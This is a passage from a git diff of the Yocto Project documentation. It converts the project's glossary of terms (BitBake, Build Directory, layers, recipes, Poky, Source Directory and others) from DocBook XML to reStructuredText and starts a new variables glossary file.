+ to allow for matching recipe names. For example, suppose you have an
+ append file named as follows:
+ ::
+
+ busybox_1.21.%.bbappend
+
+ That append file
+ would match any ``busybox_1.21.``\ x\ ``.bb`` version of the recipe. So,
+ the append file would match any of the following recipe names:
+
+ .. code-block:: shell
+
+ busybox_1.21.1.bb
+ busybox_1.21.2.bb
+ busybox_1.21.3.bb
+ busybox_1.21.10.bb
+ busybox_1.21.25.bb
+
+ .. note::
+
+ The use of the "%" character is limited in that it only works
+ directly in front of the .bbappend portion of the append file's
+ name. You cannot use the wildcard character in any other location of
+ the name.
+
+ :term:`BitBake`
+ The task executor and scheduler used by the OpenEmbedded build system to
+ build images. For more information on BitBake, see the :doc:`BitBake User
+ Manual <bitbake:index>`.
+
+ :term:`Board Support Package (BSP)`
+ A group of drivers, definitions, and other components that provide support
+ for a specific hardware configuration. For more information on BSPs, see
+ the :ref:`bsp-guide/bsp-guide:Yocto Project Board Support Package
+ Developer's Guide`.
+
+ :term:`Build Directory`
+ This term refers to the area used by the OpenEmbedded build system for
+ builds. The area is created when you ``source`` the setup environment
+ script that is found in the Source Directory
+ (i.e. :ref:`ref-manual/ref-structure:\`\`oe-init-build-env\`\``). The
+ :term:`TOPDIR` variable points to the Build Directory.
+
+ You have a lot of flexibility when creating the Build Directory.
+ Following are some examples that show how to create the directory. The
+ examples assume your :term:`Source Directory` is named ``poky``:
+
+ - Create the Build Directory inside your Source Directory and let
+ the name of the Build Directory default to ``build``:
+
+ .. code-block:: shell
+
+ $ cd $HOME/poky
+ $ source oe-init-build-env
+
+ - Create the Build Directory inside your home directory and
+ specifically name it ``test-builds``:
+
+ .. code-block:: shell
+
+ $ cd $HOME
+ $ source poky/oe-init-build-env test-builds
+
+ - Provide a directory path and specifically name the Build
+ Directory. Any intermediate folders in the pathname must exist.
+ This next example creates a Build Directory named
+ ``YP-POKYVERSION`` in your home directory within the existing
+ directory ``mybuilds``:
+
+ .. code-block:: shell
+
+ $ cd $HOME
+ $ source $HOME/poky/oe-init-build-env $HOME/mybuilds/YP-POKYVERSION
+
+ .. note::
+
+ By default, the Build Directory contains :term:`TMPDIR`, which is a
+ temporary directory the build system uses for its work. ``TMPDIR`` cannot
+ be under NFS. Thus, by default, the Build Directory cannot be under
+ NFS. However, if you need the Build Directory to be under NFS, you can
+ set this up by setting ``TMPDIR`` in your ``local.conf`` file to use a local
+ drive. Doing so effectively separates ``TMPDIR`` from :term:`TOPDIR`, which is the
+ Build Directory.
+
+ :term:`Build Host`
+ The system used to build images in a Yocto Project Development
+ environment. The build system is sometimes referred to as the development
+ host.
+
+ :term:`Classes`
+ Files that provide for logic encapsulation and inheritance so that
+ commonly used patterns can be defined once and then easily used in
+ multiple recipes. For reference information on the Yocto Project classes,
+ see the ":ref:`ref-manual/ref-classes:Classes`" chapter. Class files end with the
+ ``.bbclass`` filename extension.
+
+ :term:`Configuration File`
+ Files that hold global definitions of variables, user-defined variables,
+ and hardware configuration information. These files tell the OpenEmbedded
+ build system what to build and what to put into the image to support a
+ particular platform.
+
+ Configuration files end with a ``.conf`` filename extension. The
+ :file:`conf/local.conf` configuration file in the :term:`Build Directory`
+ contains user-defined variables that affect every build. The
+ :file:`meta-poky/conf/distro/poky.conf` configuration file defines Yocto
+ "distro" configuration variables used only when building with this
+ policy. Machine configuration files, which are located throughout the
+ :term:`Source Directory`, define variables for specific hardware and are
+ only used when building for that target (e.g. the
+ :file:`machine/beaglebone.conf` configuration file defines variables for
+ the Texas Instruments ARM Cortex-A8 development board).
+
+ :term:`Container Layer`
+ Layers that hold other layers. An example of a container layer is
+ OpenEmbedded's `meta-openembedded
+ <https://github.com/openembedded/meta-openembedded>`_ layer. The
+ ``meta-openembedded`` layer contains many ``meta-*`` layers.
+
+ :term:`Cross-Development Toolchain`
+ In general, a cross-development toolchain is a collection of software
+ development tools and utilities that run on one architecture and allow you
+ to develop software for a different, or targeted, architecture. These
+ toolchains contain cross-compilers, linkers, and debuggers that are
+ specific to the target architecture.
+
+ The Yocto Project supports two different cross-development toolchains:
+
+ - A toolchain only used by and within BitBake when building an image for a
+ target architecture.
+
+ - A relocatable toolchain used outside of BitBake by developers when
+ developing applications that will run on a targeted device.
+
+ Creation of these toolchains is simple and automated. For information on
+ toolchain concepts as they apply to the Yocto Project, see the
+ ":ref:`overview-manual/overview-manual-concepts:Cross-Development
+ Toolchain Generation`" section in the Yocto Project Overview and Concepts
+ Manual. You can also find more information on using the relocatable
+ toolchain in the :ref:`sdk-manual/sdk-manual:Yocto Project Application
+ Development and the Extensible Software Development Kit (eSDK)` manual.
+
+ :term:`Extensible Software Development Kit (eSDK)`
+ A custom SDK for application developers. This eSDK allows developers to
+ incorporate their library and programming changes back into the image to
+ make their code available to other application developers.
+
+ For information on the eSDK, see the :ref:`sdk-manual/sdk-manual:Yocto
+ Project Application Development and the Extensible Software Development
+ Kit (eSDK)` manual.
+
+ :term:`Image`
+ An image is an artifact of the BitBake build process given a collection of
+ recipes and related Metadata. Images are the binary output that run on
+ specific hardware or QEMU and are used for specific use-cases. For a list
+ of the supported image types that the Yocto Project provides, see the
+ ":ref:`ref-manual/ref-images:Images`" chapter.
+
+ :term:`Layer`
+ A collection of related recipes. Layers allow you to consolidate related
+ metadata to customize your build. Layers also isolate information used
+ when building for multiple architectures. Layers are hierarchical in
+ their ability to override previous specifications. You can include any
+ number of available layers from the Yocto Project and customize the build
+ by adding your layers after them. You can search the Layer Index for
+ layers used within Yocto Project.
+
+ For introductory information on layers, see the
+ ":ref:`overview-manual/overview-manual-yp-intro:The Yocto Project Layer
+ Model`" section in the Yocto Project Overview and Concepts Manual. For
+ more detailed information on layers, see the
+ ":ref:`dev-manual/dev-manual-common-tasks:Understanding and Creating
+ Layers`" section in the Yocto Project Development Tasks Manual. For a
+ discussion specifically on BSP Layers, see the ":ref:`bsp-guide/bsp:BSP
+ Layers`" section in the Yocto Project Board Support Packages (BSP)
+ Developer's Guide.
+
+ :term:`Metadata`
+ A key element of the Yocto Project is the Metadata that
+ is used to construct a Linux distribution and is contained in the
+ files that the :term:`OpenEmbedded Build System`
+ parses when building an image. In general, Metadata includes recipes,
+ configuration files, and other information that refers to the build
+ instructions themselves, as well as the data used to control what
+ things get built and the effects of the build. Metadata also includes
+ commands and data used to indicate what versions of software are
+ used, from where they are obtained, and changes or additions to the
+ software itself (patches or auxiliary files) that are used to fix
+ bugs or customize the software for use in a particular situation.
+ OpenEmbedded-Core is an important set of validated metadata.
+
+ In the context of the kernel ("kernel Metadata"), the term refers to
+ the kernel config fragments and features contained in the
+ :yocto_git:`yocto-kernel-cache </cgit/cgit.cgi/yocto-kernel-cache>`
+ Git repository.
+
+ :term:`OpenEmbedded-Core (OE-Core)`
+ OE-Core is metadata comprised of
+ foundational recipes, classes, and associated files that are meant to
+ be common among many different OpenEmbedded-derived systems,
+ including the Yocto Project. OE-Core is a curated subset of an
+ original repository developed by the OpenEmbedded community that has
+ been pared down into a smaller, core set of continuously validated
+ recipes. The result is a tightly controlled and an quality-assured
+ core set of recipes.
+
+ You can see the Metadata in the ``meta`` directory of the Yocto
+ Project :yocto_git:`Source Repositories </cgit/cgit.cgi/poky>`.
+
+ :term:`OpenEmbedded Build System`
+ The build system specific to the Yocto
+ Project. The OpenEmbedded build system is based on another project
+ known as "Poky", which uses :term:`BitBake` as the task
+ executor. Throughout the Yocto Project documentation set, the
+ OpenEmbedded build system is sometimes referred to simply as "the
+ build system". If other build systems, such as a host or target build
+ system are referenced, the documentation clearly states the
+ difference.
+
+ .. note::
+
+ For some historical information about Poky, see the :term:`Poky` term.
+
+ :term:`Package`
+ In the context of the Yocto Project, this term refers to a
+ recipe's packaged output produced by BitBake (i.e. a "baked recipe").
+ A package is generally the compiled binaries produced from the
+ recipe's sources. You "bake" something by running it through BitBake.
+
+ It is worth noting that the term "package" can, in general, have
+ subtle meanings. For example, the packages referred to in the
+ ":ref:`ref-manual/ref-system-requirements:required packages for the build host`"
+ section are compiled binaries that, when installed, add functionality to
+ your Linux distribution.
+
+ Another point worth noting is that historically within the Yocto
+ Project, recipes were referred to as packages - thus, the existence
+ of several BitBake variables that are seemingly mis-named, (e.g.
+ :term:`PR`, :term:`PV`, and
+ :term:`PE`).
+
+ :term:`Package Groups`
+ Arbitrary groups of software Recipes. You use
+ package groups to hold recipes that, when built, usually accomplish a
+ single task. For example, a package group could contain the recipes
+ for a company's proprietary or value-add software. Or, the package
+ group could contain the recipes that enable graphics. A package group
+ is really just another recipe. Because package group files are
+ recipes, they end with the ``.bb`` filename extension.
+
+ :term:`Poky`
+ Poky, which is pronounced *Pock*-ee, is a reference embedded
+ distribution and a reference test configuration. Poky provides the
+ following:
+
+ - A base-level functional distro used to illustrate how to customize
+ a distribution.
+
+ - A means by which to test the Yocto Project components (i.e. Poky
+ is used to validate the Yocto Project).
+
+ - A vehicle through which you can download the Yocto Project.
+
+ Poky is not a product level distro. Rather, it is a good starting
+ point for customization.
+
+ .. note::
+
+ Poky began as an open-source project initially developed by
+ OpenedHand. OpenedHand developed Poky from the existing
+ OpenEmbedded build system to create a commercially supportable
+ build system for embedded Linux. After Intel Corporation acquired
+ OpenedHand, the poky project became the basis for the Yocto
+ Project's build system.
+
+ :term:`Recipe`
+ A set of instructions for building packages. A recipe
+ describes where you get source code, which patches to apply, how to
+ configure the source, how to compile it and so on. Recipes also
+ describe dependencies for libraries or for other recipes. Recipes
+ represent the logical unit of execution, the software to build, the
+ images to build, and use the ``.bb`` file extension.
+
+ :term:`Reference Kit`
+ A working example of a system, which includes a
+ :term:`BSP<Board Support Package (BSP)>` as well as a
+ :term:`build host<Build Host>` and other components, that can
+ work on specific hardware.
+
+ :term:`Source Directory`
+ This term refers to the directory structure
+ created as a result of creating a local copy of the ``poky`` Git
+ repository ``git://git.yoctoproject.org/poky`` or expanding a
+ released ``poky`` tarball.
+
+ .. note::
+
+ Creating a local copy of the
+ poky
+ Git repository is the recommended method for setting up your
+ Source Directory.
+
+ Sometimes you might hear the term "poky directory" used to refer to
+ this directory structure.
+
+ .. note::
+
+ The OpenEmbedded build system does not support file or directory
+ names that contain spaces. Be sure that the Source Directory you
+ use does not contain these types of names.
+
+ The Source Directory contains BitBake, Documentation, Metadata and
+ other files that all support the Yocto Project. Consequently, you
+ must have the Source Directory in place on your development system in
+ order to do any development using the Yocto Project.
+
+ When you create a local copy of the Git repository, you can name the
+ repository anything you like. Throughout much of the documentation,
+ "poky" is used as the name of the top-level folder of the local copy
+ of the poky Git repository. So, for example, cloning the ``poky`` Git
+ repository results in a local Git repository whose top-level folder
+ is also named "poky".
+
+ While it is not recommended that you use tarball expansion to set up
+ the Source Directory, if you do, the top-level directory name of the
+ Source Directory is derived from the Yocto Project release tarball.
+ For example, downloading and unpacking
+ :yocto_dl:`/releases/yocto/&DISTRO_REL_TAG;/&YOCTO_POKY;.tar.bz2`
+ results in a Source Directory whose root folder is named ``poky``.
+
+ It is important to understand the differences between the Source
+ Directory created by unpacking a released tarball as compared to
+ cloning ``git://git.yoctoproject.org/poky``. When you unpack a
+ tarball, you have an exact copy of the files based on the time of
+ release - a fixed release point. Any changes you make to your local
+ files in the Source Directory are on top of the release and will
+ remain local only. On the other hand, when you clone the ``poky`` Git
+ repository, you have an active development repository with access to
+ the upstream repository's branches and tags. In this case, any local
+ changes you make to the local Source Directory can be later applied
+ to active development branches of the upstream ``poky`` Git
+ repository.
+
+ For more information on concepts related to Git repositories,
+ branches, and tags, see the
+ ":ref:`overview-manual/overview-manual-development-environment:repositories, tags, and branches`"
+ section in the Yocto Project Overview and Concepts Manual.
+
+ :term:`Task`
+ A unit of execution for BitBake (e.g.
+ :ref:`ref-tasks-compile`,
+ :ref:`ref-tasks-fetch`,
+ :ref:`ref-tasks-patch`, and so forth).
+
+ :term:`Toaster`
+ A web interface to the Yocto Project's :term:`OpenEmbedded Build System`.
+ The interface enables you to
+ configure and run your builds. Information about builds is collected
+ and stored in a database. For information on Toaster, see the
+ :doc:`../toaster-manual/toaster-manual`.
+
+ :term:`Upstream`
+ A reference to source code or repositories that are not
+ local to the development system but located in a master area that is
+ controlled by the maintainer of the source code. For example, in
+ order for a developer to work on a particular piece of code, they
+ need to first get a copy of it from an "upstream" source.
diff --git a/documentation/ref-manual/ref-terms.xml b/documentation/ref-manual/ref-terms.xml
deleted file mode 100644
index 722fa7ee27..0000000000
--- a/documentation/ref-manual/ref-terms.xml
+++ /dev/null
@@ -1,524 +0,0 @@
-<!DOCTYPE chapter PUBLIC "-//OASIS//DTD DocBook XML V4.2//EN"
-"http://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd"
-[<!ENTITY % poky SYSTEM "../poky.ent"> %poky; ] >
-
-<chapter id='ref-terms'>
-<title>Yocto Project Terms</title>
-
- <para>
- Following is a list of terms and definitions users new to the Yocto
- Project development environment might find helpful.
- While some of these terms are universal, the list includes them
- just in case:
- <itemizedlist>
- <listitem><para>
- <emphasis>Append Files:</emphasis>
- Files that append build information to a recipe file.
- Append files are known as BitBake append files and
- <filename>.bbappend</filename> files.
- The OpenEmbedded build system expects every append file to have
- a corresponding recipe (<filename>.bb</filename>) file.
- Furthermore, the append file and corresponding recipe file
- must use the same root filename.
- The filenames can differ only in the file type suffix used
- (e.g.
- <filename>formfactor_0.0.bb</filename> and
- <filename>formfactor_0.0.bbappend</filename>).</para>
-
- <para>Information in append files extends or overrides the
- information in the similarly-named recipe file.
- For an example of an append file in use, see the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#using-bbappend-files'>Using .bbappend Files in Your Layer</ulink>"
- section in the Yocto Project Development Tasks Manual.</para>
-
- <para>When you name an append file, you can use the
- "<filename>%</filename>" wildcard character to allow for
- matching recipe names.
- For example, suppose you have an append file named as follows:
- <literallayout class='monospaced'>
- busybox_1.21.%.bbappend
- </literallayout>
- That append file would match any
- <filename>busybox_1.21.</filename><replaceable>x</replaceable><filename>.bb</filename>
- version of the recipe.
- So, the append file would match any of the following recipe names:
- <literallayout class='monospaced'>
- busybox_1.21.1.bb
- busybox_1.21.2.bb
- busybox_1.21.3.bb
- busybox_1.21.10.bb
- busybox_1.21.25.bb
- </literallayout>
- <note><title>Important</title>
- The use of the "<filename>%</filename>" character
- is limited in that it only works directly in front of the
- <filename>.bbappend</filename> portion of the append file's
- name.
- You cannot use the wildcard character in any other
- location of the name.
- </note>
- </para></listitem>
- <listitem><para id='bitbake-term'>
- <emphasis>BitBake:</emphasis>
- The task executor and scheduler used by the OpenEmbedded build
- system to build images.
- For more information on BitBake, see the
- <ulink url='&YOCTO_DOCS_BB_URL;'>BitBake User Manual</ulink>.
- </para></listitem>
- <listitem><para id='board-support-package-bsp-term'>
- <emphasis>Board Support Package (BSP):</emphasis>
- A group of drivers, definitions, and other components that
- provide support for a specific hardware configuration.
- For more information on BSPs, see the
- <ulink url='&YOCTO_DOCS_BSP_URL;'>Yocto Project Board Support Package (BSP) Developer's Guide</ulink>.
- </para></listitem>
- <listitem>
- <para id='build-directory'>
- <emphasis>Build Directory:</emphasis>
- This term refers to the area used by the OpenEmbedded build
- system for builds.
- The area is created when you <filename>source</filename> the
- setup environment script that is found in the Source Directory
- (i.e. <link linkend='structure-core-script'><filename>&OE_INIT_FILE;</filename></link>).
- The
- <link linkend='var-TOPDIR'><filename>TOPDIR</filename></link>
- variable points to the Build Directory.</para>
-
- <para>You have a lot of flexibility when creating the Build
- Directory.
- Following are some examples that show how to create the
- directory.
- The examples assume your
- <link linkend='source-directory'>Source Directory</link> is
- named <filename>poky</filename>:
- <itemizedlist>
- <listitem><para>Create the Build Directory inside your
- Source Directory and let the name of the Build
- Directory default to <filename>build</filename>:
- <literallayout class='monospaced'>
- $ cd $HOME/poky
- $ source &OE_INIT_FILE;
- </literallayout>
- </para></listitem>
- <listitem><para>Create the Build Directory inside your
- home directory and specifically name it
- <filename>test-builds</filename>:
- <literallayout class='monospaced'>
- $ cd $HOME
- $ source poky/&OE_INIT_FILE; test-builds
- </literallayout>
- </para></listitem>
- <listitem><para>
- Provide a directory path and specifically name the
- Build Directory.
- Any intermediate folders in the pathname must exist.
- This next example creates a Build Directory named
- <filename>YP-&POKYVERSION;</filename>
- in your home directory within the existing
- directory <filename>mybuilds</filename>:
- <literallayout class='monospaced'>
- $ cd $HOME
- $ source $HOME/poky/&OE_INIT_FILE; $HOME/mybuilds/YP-&POKYVERSION;
- </literallayout>
- </para></listitem>
- </itemizedlist>
- <note>
- By default, the Build Directory contains
- <link linkend='var-TMPDIR'><filename>TMPDIR</filename></link>,
- which is a temporary directory the build system uses for
- its work.
- <filename>TMPDIR</filename> cannot be under NFS.
- Thus, by default, the Build Directory cannot be under NFS.
- However, if you need the Build Directory to be under NFS,
- you can set this up by setting <filename>TMPDIR</filename>
- in your <filename>local.conf</filename> file
- to use a local drive.
- Doing so effectively separates <filename>TMPDIR</filename>
- from <filename>TOPDIR</filename>, which is the Build
- Directory.
- </note>
- </para></listitem>
- <listitem><para id='hardware-build-system-term'>
- <emphasis>Build Host:</emphasis>
- The system used to build images in a Yocto Project
- Development environment.
- The build system is sometimes referred to as the
- <firstterm>development host</firstterm>.
- </para></listitem>
- <listitem><para>
- <emphasis>Classes:</emphasis>
- Files that provide for logic encapsulation and inheritance so
- that commonly used patterns can be defined once and then
- easily used in multiple recipes.
- For reference information on the Yocto Project classes, see the
- "<link linkend='ref-classes'>Classes</link>" chapter.
- Class files end with the <filename>.bbclass</filename>
- filename extension.
- </para></listitem>
- <listitem><para>
- <emphasis>Configuration File:</emphasis>
- Files that hold global definitions of variables,
- user-defined variables, and hardware configuration
- information.
- These files tell the OpenEmbedded build system what to
- build and what to put into the image to support a
- particular platform.</para>
-
- <para>Configuration files end with a <filename>.conf</filename>
- filename extension.
- The <filename>conf/local.conf</filename> configuration file in
- the
- <link linkend='build-directory'>Build Directory</link>
- contains user-defined variables that affect every build.
- The <filename>meta-poky/conf/distro/poky.conf</filename>
- configuration file defines Yocto "distro" configuration
- variables used only when building with this policy.
- Machine configuration files, which
- are located throughout the
- <link linkend='source-directory'>Source Directory</link>, define
- variables for specific hardware and are only used when building
- for that target (e.g. the
- <filename>machine/beaglebone.conf</filename> configuration
- file defines variables for the Texas Instruments ARM Cortex-A8
- development board).
- </para></listitem>
- <listitem><para id='term-container-layer'>
- <emphasis>Container Layer:</emphasis>
- Layers that hold other layers.
- An example of a container layer is OpenEmbedded's
- <ulink url='https://github.com/openembedded/meta-openembedded'><filename>meta-openembedded</filename></ulink>
- layer.
- The <filename>meta-openembedded</filename> layer contains
- many <filename>meta-*</filename> layers.
- </para></listitem>
- <listitem><para id='cross-development-toolchain'>
- <emphasis>Cross-Development Toolchain:</emphasis>
- In general, a cross-development toolchain is a collection of
- software development tools and utilities that run on one
- architecture and allow you to develop software for a
- different, or targeted, architecture.
- These toolchains contain cross-compilers, linkers, and
- debuggers that are specific to the target architecture.</para>
-
- <para>The Yocto Project supports two different cross-development
- toolchains:
- <itemizedlist>
- <listitem><para>
- A toolchain only used by and within
- BitBake when building an image for a target
- architecture.
- </para></listitem>
- <listitem><para>A relocatable toolchain used outside of
- BitBake by developers when developing applications
- that will run on a targeted device.
- </para></listitem>
- </itemizedlist></para>
-
- <para>Creation of these toolchains is simple and automated.
- For information on toolchain concepts as they apply to the
- Yocto Project, see the
- "<ulink url='&YOCTO_DOCS_OM_URL;#cross-development-toolchain-generation'>Cross-Development Toolchain Generation</ulink>"
- section in the Yocto Project Overview and Concepts Manual.
- You can also find more information on using the
- relocatable toolchain in the
- <ulink url='&YOCTO_DOCS_SDK_URL;'>Yocto Project Application Development and the Extensible Software Development Kit (eSDK)</ulink>
- manual.
- </para></listitem>
- <listitem><para>
- <emphasis>Extensible Software Development Kit (eSDK):</emphasis>
- A custom SDK for application developers.
- This eSDK allows developers to incorporate their library
- and programming changes back into the image to make
- their code available to other application developers.</para>
-
- <para>For information on the eSDK, see the
- <ulink url='&YOCTO_DOCS_SDK_URL;'>Yocto Project Application Development and the Extensible Software Development Kit (eSDK)</ulink>
- manual.
- </para></listitem>
- <listitem><para>
- <emphasis>Image:</emphasis>
- An image is an artifact of the BitBake build process given
- a collection of recipes and related Metadata.
- Images are the binary output that run on specific hardware or
- QEMU and are used for specific use-cases.
- For a list of the supported image types that the Yocto Project
- provides, see the
- "<link linkend='ref-images'>Images</link>"
- chapter.
- </para></listitem>
- <listitem><para>
- <emphasis>Layer:</emphasis>
- A collection of related recipes.
- Layers allow you to consolidate related metadata to
- customize your build.
- Layers also isolate information used when building
- for multiple architectures.
- Layers are hierarchical in their ability to override
- previous specifications.
- You can include any number of available layers from the
- Yocto Project and customize the build by adding your
- layers after them.
- You can search the Layer Index for layers used within
- Yocto Project.</para>
-
- <para>For introductory information on layers, see the
- "<ulink url='&YOCTO_DOCS_OM_URL;#the-yocto-project-layer-model'>The Yocto Project Layer Model</ulink>"
- section in the Yocto Project Overview and Concepts Manual.
- For more detailed information on layers, see the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#understanding-and-creating-layers'>Understanding and Creating Layers</ulink>"
- section in the Yocto Project Development Tasks Manual.
- For a discussion specifically on BSP Layers, see the
- "<ulink url='&YOCTO_DOCS_BSP_URL;#bsp-layers'>BSP Layers</ulink>"
- section in the Yocto Project Board Support Packages (BSP)
- Developer's Guide.
- </para></listitem>
- <listitem><para id='metadata'>
- <emphasis>Metadata:</emphasis>
- A key element of the Yocto Project is the Metadata that
- is used to construct a Linux distribution and is contained
- in the files that the
- <link linkend='build-system-term'>OpenEmbedded build system</link>
- parses when building an image.
- In general, Metadata includes recipes, configuration
- files, and other information that refers to the build
- instructions themselves, as well as the data used to
- control what things get built and the effects of the
- build.
- Metadata also includes commands and data used to
- indicate what versions of software are used, from
- where they are obtained, and changes or additions to the
- software itself (patches or auxiliary files) that
- are used to fix bugs or customize the software for use
- in a particular situation.
- OpenEmbedded-Core is an important set of validated
- metadata.</para>
-
- <para>In the context of the kernel ("kernel Metadata"), the
- term refers to the kernel config fragments and features
- contained in the
- <ulink url='&YOCTO_GIT_URL;/cgit/cgit.cgi/yocto-kernel-cache'><filename>yocto-kernel-cache</filename></ulink>
- Git repository.
- </para></listitem>
- <listitem><para id='oe-core'>
- <emphasis>OpenEmbedded-Core (OE-Core):</emphasis>
- OE-Core is metadata comprised of foundational recipes,
- classes, and associated files that are meant to be
- common among many different OpenEmbedded-derived systems,
- including the Yocto Project.
- OE-Core is a curated subset of an original repository
- developed by the OpenEmbedded community that has been
- pared down into a smaller, core set of continuously
- validated recipes.
- The result is a tightly controlled and an quality-assured
- core set of recipes.</para>
-
- <para>You can see the Metadata in the
- <filename>meta</filename> directory of the Yocto Project
- <ulink url='http://git.yoctoproject.org/cgit/cgit.cgi'>Source Repositories</ulink>.
- </para></listitem>
- <listitem><para id='build-system-term'>
- <emphasis>OpenEmbedded Build System:</emphasis>
- The build system specific to the Yocto Project.
- The OpenEmbedded build system is based on another project known
- as "Poky", which uses
- <link linkend='bitbake-term'>BitBake</link> as the task
- executor.
- Throughout the Yocto Project documentation set, the
- OpenEmbedded build system is sometimes referred to simply
- as "the build system".
- If other build systems, such as a host or target build system
- are referenced, the documentation clearly states the
- difference.
- <note>
- For some historical information about Poky, see the
- <link linkend='poky'>Poky</link> term.
- </note>
- </para></listitem>
- <listitem><para>
- <emphasis>Package:</emphasis>
- In the context of the Yocto Project, this term refers to a
- recipe's packaged output produced by BitBake (i.e. a
- "baked recipe").
- A package is generally the compiled binaries produced from the
- recipe's sources.
- You "bake" something by running it through BitBake.</para>
-
- <para>It is worth noting that the term "package" can,
- in general, have subtle meanings.
- For example, the packages referred to in the
- "<link linkend='required-packages-for-the-build-host'>Required Packages for the Build Host</link>"
- section are compiled binaries that, when installed, add
- functionality to your Linux distribution.</para>
-
- <para>Another point worth noting is that historically within
- the Yocto Project, recipes were referred to as packages - thus,
- the existence of several BitBake variables that are seemingly
- mis-named,
- (e.g. <link linkend='var-PR'><filename>PR</filename></link>,
- <link linkend='var-PV'><filename>PV</filename></link>, and
- <link linkend='var-PE'><filename>PE</filename></link>).
- </para></listitem>
- <listitem><para>
- <emphasis>Package Groups:</emphasis>
- Arbitrary groups of software Recipes.
- You use package groups to hold recipes that, when built,
- usually accomplish a single task.
- For example, a package group could contain the recipes for a
- company’s proprietary or value-add software.
- Or, the package group could contain the recipes that enable
- graphics.
- A package group is really just another recipe.
- Because package group files are recipes, they end with the
- <filename>.bb</filename> filename extension.
- </para></listitem>
- <listitem><para id='poky'>
- <emphasis>Poky:</emphasis>
- Poky, which is pronounced <emphasis>Pock</emphasis>-ee,
- is a reference embedded distribution and a reference
- test configuration.
- Poky provides the following:
- <itemizedlist>
- <listitem><para>
- A base-level functional distro used to illustrate
- how to customize a distribution.
- </para></listitem>
- <listitem><para>
- A means by which to test the Yocto Project
- components (i.e. Poky is used to validate
- the Yocto Project).
- </para></listitem>
- <listitem><para>
- A vehicle through which you can download
- the Yocto Project.
- </para></listitem>
- </itemizedlist>
- Poky is not a product level distro.
- Rather, it is a good starting point for customization.
- <note>
- Poky began as an open-source
- project initially developed by OpenedHand.
- OpenedHand developed Poky from the existing
- OpenEmbedded build system to create a commercially
- supportable build system for embedded Linux.
- After Intel Corporation acquired OpenedHand, the
- poky project became the basis for the Yocto Project's
- build system.
- </note>
- </para></listitem>
- <listitem><para>
- <emphasis>Recipe:</emphasis>
- A set of instructions for building packages.
- A recipe describes where you get source code, which patches
- to apply, how to configure the source, how to compile it and so on.
- Recipes also describe dependencies for libraries or for other
- recipes.
- Recipes represent the logical unit of execution, the software
- to build, the images to build, and use the
- <filename>.bb</filename> file extension.
- </para></listitem>
- <listitem><para id='reference-kit-term'>
- <emphasis>Reference Kit:</emphasis>
- A working example of a system, which includes a
- <link linkend='board-support-package-bsp-term'>BSP</link>
- as well as a
- <link linkend='hardware-build-system-term'>build host</link>
- and other components, that can work on specific hardware.
- </para></listitem>
- <listitem>
- <para id='source-directory'>
- <emphasis>Source Directory:</emphasis>
- This term refers to the directory structure created as a result
- of creating a local copy of the <filename>poky</filename> Git
- repository <filename>git://git.yoctoproject.org/poky</filename>
- or expanding a released <filename>poky</filename> tarball.
- <note>
- Creating a local copy of the <filename>poky</filename>
- Git repository is the recommended method for setting up
- your Source Directory.
- </note>
- Sometimes you might hear the term "poky directory" used to refer
- to this directory structure.
- <note>
- The OpenEmbedded build system does not support file or
- directory names that contain spaces.
- Be sure that the Source Directory you use does not contain
- these types of names.
- </note></para>
-
- <para>The Source Directory contains BitBake, Documentation,
- Metadata and other files that all support the Yocto Project.
- Consequently, you must have the Source Directory in place on
- your development system in order to do any development using
- the Yocto Project.</para>
-
- <para>When you create a local copy of the Git repository, you
- can name the repository anything you like.
- Throughout much of the documentation, "poky"
- is used as the name of the top-level folder of the local copy of
- the poky Git repository.
- So, for example, cloning the <filename>poky</filename> Git
- repository results in a local Git repository whose top-level
- folder is also named "poky".</para>
-
- <para>While it is not recommended that you use tarball expansion
- to set up the Source Directory, if you do, the top-level
- directory name of the Source Directory is derived from the
- Yocto Project release tarball.
- For example, downloading and unpacking
- <filename>&YOCTO_POKY_TARBALL;</filename> results in a
- Source Directory whose root folder is named
- <filename>&YOCTO_POKY;</filename>.</para>
-
- <para>It is important to understand the differences between the
- Source Directory created by unpacking a released tarball as
- compared to cloning
- <filename>git://git.yoctoproject.org/poky</filename>.
- When you unpack a tarball, you have an exact copy of the files
- based on the time of release - a fixed release point.
- Any changes you make to your local files in the Source Directory
- are on top of the release and will remain local only.
- On the other hand, when you clone the <filename>poky</filename>
- Git repository, you have an active development repository with
- access to the upstream repository's branches and tags.
- In this case, any local changes you make to the local
- Source Directory can be later applied to active development
- branches of the upstream <filename>poky</filename> Git
- repository.</para>
-
- <para>For more information on concepts related to Git
- repositories, branches, and tags, see the
- "<ulink url='&YOCTO_DOCS_OM_URL;#repositories-tags-and-branches'>Repositories, Tags, and Branches</ulink>"
- section in the Yocto Project Overview and Concepts Manual.
- </para></listitem>
- <listitem><para><emphasis>Task:</emphasis>
- A unit of execution for BitBake (e.g.
- <link linkend='ref-tasks-compile'><filename>do_compile</filename></link>,
- <link linkend='ref-tasks-fetch'><filename>do_fetch</filename></link>,
- <link linkend='ref-tasks-patch'><filename>do_patch</filename></link>,
- and so forth).
- </para></listitem>
- <listitem><para id='toaster-term'><emphasis>Toaster:</emphasis>
- A web interface to the Yocto Project's
- <link linkend='build-system-term'>OpenEmbedded Build System</link>.
- The interface enables you to configure and run your builds.
- Information about builds is collected and stored in a database.
- For information on Toaster, see the
- <ulink url='&YOCTO_DOCS_TOAST_URL;'>Toaster User Manual</ulink>.
- </para></listitem>
- <listitem><para>
- <emphasis>Upstream:</emphasis>
- A reference to source code or repositories
- that are not local to the development system but located in a
- master area that is controlled by the maintainer of the source
- code.
- For example, in order for a developer to work on a particular
- piece of code, they need to first get a copy of it from an
- "upstream" source.
- </para></listitem>
- </itemizedlist>
- </para>
-
-</chapter>
-<!--
-vim: expandtab tw=80 ts=4
--->
diff --git a/documentation/ref-manual/ref-variables.rst b/documentation/ref-manual/ref-variables.rst
new file mode 100644
index 0000000000..227c81fc39
--- /dev/null
+++ b/documentation/ref-manual/ref-variables.rst
@@ -0,0 +1,8801 @@
+.. SPDX-License-Identifier: CC-BY-SA-2.0-UK
+
+******************
+Variables Glossary
+******************
+
+This chapter lists common variables used in the OpenEmbedded build
+system and gives an overview of their function and contents.
+
+:term:`A <ABIEXTENSION>` :term:`B` :term:`C <CACHE>`
+:term:`D` :term:`E <EFI_PROVIDER>` :term:`F <FEATURE_PACKAGES>`
+:term:`G <GCCPIE>` :term:`H <HOMEPAGE>` :term:`I <ICECC_DISABLED>`
+:term:`K <KARCH>` :term:`L <LABELS>` :term:`M <MACHINE>`
